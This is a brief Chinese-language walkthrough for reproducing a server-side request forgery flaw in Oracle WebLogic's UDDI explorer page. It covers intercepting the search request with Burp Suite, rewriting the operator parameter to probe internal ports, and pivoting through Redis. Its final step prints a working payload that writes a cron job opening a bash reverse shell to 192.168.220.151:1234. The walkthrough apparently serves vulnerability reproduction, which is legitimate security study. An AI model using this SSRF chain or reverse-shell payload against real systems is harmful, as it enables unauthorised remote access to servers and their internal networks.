访问7001端口
二、漏洞复现步骤1、漏洞存在页面 /uddiexplorer/searchpublicregistries.jsp
2、检查一下ibm这个地方看看
发现是个连接,这就可能存在ssrf了
3、使用burp suite抓包,点击search
4、修改operator参数的连接
5、访问结果访问不存在的端口返回 could not connect over http
访问存在的端口返回状态码
访问内网
利用redis反弹shell的payloadset 1 \n\n\n\n* * * * * root bash -i >& /dev/tcp/192.168.220.151/1234 0>&1\n\n\n\nconfig set dir /etc/config set dbfilename crontabsave
以上就是如何实现weblogic ssrf漏洞复现的详细内容。